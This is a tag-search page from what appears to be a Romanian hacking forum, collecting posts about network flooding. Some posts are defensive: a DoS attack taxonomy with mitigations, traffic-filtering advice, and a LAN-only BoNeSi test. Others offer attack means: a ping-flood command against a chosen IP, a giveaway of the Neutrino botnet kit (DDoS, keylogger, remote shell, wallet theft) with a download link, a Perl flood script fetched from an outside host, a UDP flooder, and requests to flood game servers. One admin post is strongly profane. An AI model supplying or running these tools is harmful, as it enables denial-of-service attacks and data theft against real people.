Search the Community
Showing results for tags 'flood'.
-
Scoala pentru FLOOD Pentru a da flood trebuie doar CMD Pentru a porni CMD foloseste tastele WINDOWS-R si scrieti in RUN CMD Comanda este : ping -t -l 65000 si ip-ul dorit
-
------------------------------------------------- Russian thread google translated: ------------------------------------------------- Neutrino Bot - The main functional * HTTP (S) flood (methods GET \ POST) * Smart DDoS * AntiDDOS flood (Emulation js \ cookies) * Slowloris flood * Download flood * TCP flood * UDP flood * Loader (exe, dll, vbs, bat ... + can specify parameters for running the file) * Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window) * Command shell (remote command execution using shell windows) * Stealing files by mask (eg bitcoin wallets) * Launch the browser with one of these links (aka Cheaters views) * Spoofing Hosts * Stilling Win keys * Reproduction (USB \ Archive) * Purity downloads (number found "neighbors" on the computer) * Identifying the installed AV (on all Windows except Server) * Update * Work through the gasket - Additional Features * Anti debugging * AntiVM * Detect sandboxes * Detect all online services automatic analysis * BotKiller * Bot protection (protection process \ file \ registry branches) * Unlimited number of concurrent commands (Some teams have a higher priority than others, and their execution stops others) * Unlimited number of backup domain * Quiet operation even under a limited account * Do not load the CPU - Functional admin * Flexible system for creating jobs * Detailed statistics for bots * Ability to give commands to each country separately or bot * Customizable otstuk bots * Sort bots in Articles IP \ Live \ Country \ OS * System Bans. - Weight uncompressed binary file ~ 50kb (PL - C) - Boat tested on the entire line of Windows, from XP to 8.1 (x32/64) tags -Astea sunt preturile la vanzator dar le ofer gratuit Full set (+ bot + admin panel to build an unlimited number of domains) - $ 200 Rebuild (also unlim. Quantity domains) - $ 10 Update (functional) - $ 20 Builder - $ 550 Payment - WM \ BTC \ Perfect Download: https://mega.co.nz/#!vgBgHIrC!aF9L2ea5xcRU3vQ92rTzA5kOCAeqe43M0jowB9t7Nqs Daca nu aveti unde sa il puneti va pot oferi server Aici
-
Salut RST Am nevoie de un program sau un script in root pentru a da flood serverelor de Metin2, am incercat udp.pl pe root dar nimic nu am reusit. Va rog fara glume sau mistouri, daca ma puteti ajuta bine daca nu nu, nu vreau comentarii inutile
-
RooT Flood + PERL 1. vps Ukrainian data center. VPS Hosting. 2. 10 minute 10 Minute Mail 2. perl esl.pl http://andreyesl.16mb.com/esl.pl Like and subscribe ! THANKS!!! https://www.youtube.com/watch?v=AFmPVdAB4kY
-
RooT Flood 100% Free Linux https://www.youtube.com/watch?v=AFmPVdAB4kY
-
Hei cine ma poate ajuta si pe mine cu un program flood si niste "Instructiuni" Multumesc anticipat
- 1 reply
-
- flood
- instructiuni
-
(and 3 more)
Tagged with:
-
Salut.Azi mi-a dat unul add pe skype, si de atunci numai probleme. Am mai primit mesaje de la el pe rs, ca imi da flood ca nush ce. Mi-a aflat ip-ul prin skype, am gasit un kkt de site care face asta. Cum as putea sa il opresc?Nu ma afecteaza prea mult, ca mi se opreste netul cateva secunde si dupaia isi revine, dar sa nu se mai creada asa superior... Eu as putea sa-i fac ceva?Am doar ip-ul lui...
-
CIne are un flood de picat net de pe linux??
-
Daca stiti si voi cum sa dau flood la un server de minecraft nu prea po****t , atunci plz un tutorial video sau scris plz !
-
Salut baieti ,am vazut ca Team-CrackerS astia si-au revenit iar si am zis sa ma pun pe ei Team-CrackerS pwned Nu cred ca isi va mai reveni . Jegosi m-au reclamat la provider si acum stau pe netu la vecini pana se rezolva ) Ce pareri aveti ?
-
//
-
Mai jos, o sa va prezint majoritatea tipurilor de atac dos/ddos cat si ce anume vizeaza ele. Am omis din lista atacurile ce tineau de anii 95 (igmp, nuke, windows 95 based. Subiectul este ocolit de multi pentru ca sunt foarte putine companiile care ofera solutii reale de filtrare a atacurilor (de regula este bullshit de marketing), iar cele care ofera astfel de solutii, este logic ca le tin private, pentru ca preturile sunt extrem de mari iar tehnologiile de filtering sunt putine si de multe ori ineficiente in fata atacurilor “moderne”. Cam atat despre asta pentru moment, si sa trecem la subiectul acestui tutorial. [*] UDP Flood Congestia conexiunii. Este un atack ce 'consuma' latimea de banda. [*] ICMP Flood Congestia conexiunii. Este un atack ce 'consuma' latimea de banda. [*] TCP Flood (SYN) Congestia conexiunii. De asemenea, consuma ciclii de procesare (Epuizarea resurselor CPU). Poate face inoperabil OS si poate folosi toti socketii disponibili. Incarca tabelele de conexiuni si face sistemul sa nu accepte conexiuni noi, pentru ca lista de asteptare (queue) devine plina. Daca este cu sursa spofata si numarul de pachete este considerabil, este aproape imposibil de filtrat. Poate fi ameliorat efectul doar cu echipamente specializate sau distribuirea serviciilor in clustere. FreeBSD are un sistem relativ bun de protectie pentru acest lucru (synproxy), insa la foarte multe sesiuni tcp noi pe secunda, acesta nu face fata cu un singur sistem folosit pentru filtrare. De asemenea, pe FreeBSD exista mai multe mecanisme pentru acest lucru. Unul dintre acestea este syncache. O alta metoda de a ameliora efectele sale, sunt reducerea timpilor de acceptare a conexiunilor. Este cel mai 'profi' atac (D)DoS. [*] Smurf attack Congestia conexiunii. Atacurile smurf se mai numesc si 'ICMP amplification attack' sau 'Reflection Attack'. Acest tip de atack vizeaza adresa broadcast. [*] Fraggle attack Congestia conexiunii. Fraggle este un tip de flood asemanator cu Smurf, insa pachetele trimise sunt UDP. Acest tip de atack vizeaza adresa broadcast, DST PORT 7 (echo) [*] Papasmurf attack Congestia conexiunii. Acest tip de flood este un hibrid rezultat din combinarea atacurilor Fraggle+Smurf. [*] Land attack Daca serverul vizat este linux, in majoritatea cazurilor kernelul da crash. Sursa atacului este alterata, astfel incat devinde identica cu destinatia, fapt pentru care, kernelul incepe sa-i(si) raspunda cu 'ack'. (war ack) Nota: Nu am idee daca mai functioneaza la kernel 2.6.x ; La FreeBSD nu functioneaza pentru ca are un sistem de protectie ce face sa nu accepte pachete din afara cu adresa ip configurata pe interfata. [*] Eyenetdee Acest tip de atack este foarte asemanator cu 'Land attack', diferenta este ca sunt folosite pachete SYN. Tinta acestui atac sunt aplicatiile, in special pop3, imap si ftp. (probabilitatea de a bloca aplicatiile) [*] DNS Amplification Attack Congestia conexiunii. De asemenea, consuma ciclii de procesare (Epuizarea resurselor CPU) Aceste atacuri se bazeaza pe baza 'amplificarii' in intensitate, din cauza folosirii interogarilor recursive. Din moment ce vizeaza doar serviciul DNS (bind/named), in cazul in care este bine configurat si nu accepta interogari recursive, acest atac nu are randament. [*] TCP Fin Flood (spoofed) Acest tip de flood consuma ciclii de procesare (Epuizarea resurselor CPU), in cazuri rare genereaza si congestiunea conexiunii. Sursa pachetelor este alterata (spoofata) iar pachetele tcp au flag-ul FIN setat. Este usor de filtrat, in special pe FreeBSD. [*] TCP RST flood (spoofed) Acest tip de flood consuma ciclii de procesare (Epuizarea resurselor CPU) si genereaza congestiunea conexiunii. Sursa pachetelor este alterata (spoofata) iar pachetele tcp au flag-ul RST setat. Este relativ usor de filtrat. [*] TCP ACK (spoofed) Acest tip de flood consuma ciclii de procesare (Epuizarea resurselor CPU) si genereaza congestiunea conexiunii. Sursa pachetelor este alterata (spoofata) iar pachetele tcp au flag-ul ACK setat. [*] SIP Flood Acest tip de atac are ca tinta echipamentele VoIP si vizeaza blocarea lor. Se bazeaza pe trimiterea de mesje 'INVITE' catre porturile 5060, 5061 (in general) Nota: o sa fie alt subiect despre atacurile dos/ddos low-bandwidth based.
- 5 replies
-
- ddos
- denial of service
-
(and 2 more)
Tagged with:
-
La un tutorial ASM facut de @c0unt3rlog1c despre un udp flooder au fost ceva intrebari puse de @Zatarra; Pentru a nu altera threadul omului, am deschis discutia asta. Sunt sigur ca sunt multi care au astfel de intrebari. Va astept aici cu orice intrebare legata de atacurile (D)DoS, efectele acestora cat si metodele de inlaturare ale efectelor. Din exemplul meu din acel thread: 21:07:38.225850 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225855 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225857 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225867 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225869 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225994 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225996 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225998 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225999 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 Se pot observa urmatoarele caracteristici ale acestui atac (profilul): - Srcaddr este static (172.16.0.4) - Srcport este static (37438) - Dstport este static (80) ; Avand port 80, tinta atacului este serviciul web. - Lungimea pachetului nu este variabila (length 1) - Atacul este de tip UDP / Non spoofed. Nota: Atacurile udp vizeaza congestia conexiunii. Este un atack ce 'consuma' latimea de banda. Deci, chiar daca filtrati atacul (caz in care pachetele nu mai sunt procesate), latimea de banda o sa fie utilizata. O sa luam intrebarile puse in threadul celalalt (le folosim ca scenarii): - Solutia in ambele scenarii, avand in vedere exemplul de atac de mai sus este filtrarea pachetelor UDP ce au ca tinta portul 80. Acesta fiind folosit de HTTP, comunicarea client->server se face doar pe TCP.
- 25 replies
-
- 1
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with:
-
UDP-fl00d.rar UN mic flooder UDP! (.NET 4) Astept pareri!
-
Ce este BoNeSi ? BoNeSi este un tool pentru simularea atacurilor DDoS (distributed denial of service) pentru a studia efectele unui atac DDoS cat si posibilitatea de filtrare (sau minimizare a efectelor) unui astfel de atac. Am testat acest tool pe un server local cu Debian utilizand ca SRC IP 10.0.0.7 iar ca DST IP 10.0.0.8 pe care am un server ce ruleaza FreeBSD. La primul test, cel cu protocol tcp, capacitatea atacului a fost de 5096.83 flows/s. Curios este faptul ca desi rata la inbound era de doar 10,16 Mbps, serverul web ce rula pe DST era inaccesibil. La al II-lea test, cel cu protocol udp, capacitatea atacului a fost de 16602.50 flows/s. iar rata la inbound de 3,3 Mbps, iar la al III-lea test, cel cu icmp echo request, capacitatea atacului a fost de 7248.00 flows/s. Cele doua servere folosite la acest test, sunt conectate in LAN printr-un switch Allied Telesis iar link-ul este de 100mbps. In toate testele (tcp, icmp, udp) sursele de atac sunt alterate (spoofed) cu adresele ip din fisierul “50k-bots” Mentionez ca pe sistemul atacat era instalat apache2, prefork (default) si nu erau modificari la ListenBacklog. Instalare pe debian: tex work # apt-get install libnet1-dev libpcap-dev tex work # wget http://bonesi.googlecode.com/files/bonesi-0.1.1.tar.gz tex work # tar zxvf bonesi-0.1.1.tar.gz tex work # cd bonesi-0.1.1 tex bonesi-0.1.1 # ./configure && make tex bonesi-0.1.1 # cp src/bonesi . Utilizare: Test I: Pentru syn spoofed (tcp attack): ./bonesi --ips=50k-bots --protocol=tcp -d eth0 10.0.0.8:80 Test II: Pentru udp spoofed: ./bonesi --ips=50k-bots --protocol=udp -d eth0 10.0.0.8:80 Test III: Pentru icmp spoofed (echo request): ./bonesi --ips=50k-bots --protocol=icmp -d eth0 10.0.0.8:80 Vizualizare pachete cu tcpdump la primul test (5 linii): 02:21:23.681982 IP 88.126.89.159.22458 > 10.0.0.8.80: Flags [S], seq 1237269533, win 4096, options [mss 1402,nop,wscale 0,nop,nop,TS val 1365282408 ecr 0,sackOK,eol], length 0 02:21:23.682074 IP 122.105.124.102.24571 > 10.0.0.8.80: Flags [S], seq 829903001, win 4096, options [mss 1460,nop,sackOK,eol], length 0 02:21:23.682115 IP 240.179.162.42.14539 > 10.0.0.8.80: Flags [S], seq 333938234, win 4096, options [mss 1516,nop,sackOK,eol], length 0 02:21:23.682154 IP 251.224.133.235.14748 > 10.0.0.8.80: Flags [S], seq 1230917056, win 4096, options [mss 1516,nop,sackOK,eol], length 0 02:21:23.682195 IP 48.44.25.215.26626 > 10.0.0.8.80: Flags [S], seq 802302864, win 4096, options [mss 1430,sackOK,TS val 1840537518 ecr 0,nop,wscale 0], length 0 Vizualizare pachete cu tcpdump la al II-lea test (5 linii): 02:28:40.917828 IP 141.162.25.189.34536 > 10.0.0.8.80: UDP, length 32 02:28:40.918783 IP 155.243.83.223.18623 > 10.0.0.8.80: UDP, length 32 02:28:40.918791 IP 255.46.11.142.29747 > 10.0.0.8.80: UDP, length 32 02:28:40.918797 IP 145.217.172.116.33624 > 10.0.0.8.80: UDP, length 32 02:28:40.918804 IP 246.242.203.210.10015 > 10.0.0.8.80: UDP, length 32 Vizualizare pachete cu tcpdump la al III-lea test (5 linii): 02:35:49.156760 IP 11.132.139.168 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 02:35:49.156770 IP 35.68.7.119 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 02:35:49.157715 IP 136.87.254.149 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 02:35:49.157722 IP 12.23.245.154 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 02:35:49.157727 IP 91.33.156.53 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 Note: - Din cate puteti observa, testele sunt facute in LAN. Atacurile DoS/DDoS sunt ilegale. Va sfatuiesc sa nu faceti teste catre retele care nu va apartin (sau cel putin, nu dupa ip-urile voastre) - Am specificat la inceput la ce anume poate fi de folos (tot din acest motiv, am facut captura la pachete)
- 18 replies
-
- bonesi
- ddos attack
-
(and 2 more)
Tagged with:
-
De cateva zile un copil ratat ce umbla ma-sa prin santuri rupta de beata, lingand-o cainii pe bot, si tacsu se uita la meciuri de fotbal, asculta manele, bea bere si sparge seminte, scarpinandu-se la pula cu gandul la mancarea de cacat ce i-a facut-o nevasta-sa, tot da flood in rstcenter.com. Am pus filtre pe udp total, sa nu se mai chinuie, am pus filtre pe sesiuni tcp, tot insista. Acum da cu un rahat de botnet din "winblows-uri", cu http get. Ce pula mea ma, ce castiga daca da flood la un forum. Chiar e nevoie sa pun 30 de servere pe 1gbit cu load balancing, ca sa-i arat ca nu pica atunci cand vrea pulicica lui mica si atrofiata ? M-a mai trezit si cu noaptea in cap, sa stau sa filtrez rahatul manual. Copii labagii facuti din laba trista si carati de muste-n 3,14zda, plantati pe cale orala si nascuti pe cea dorsala. Se pare ca nu-i deranjaza lucrul asta.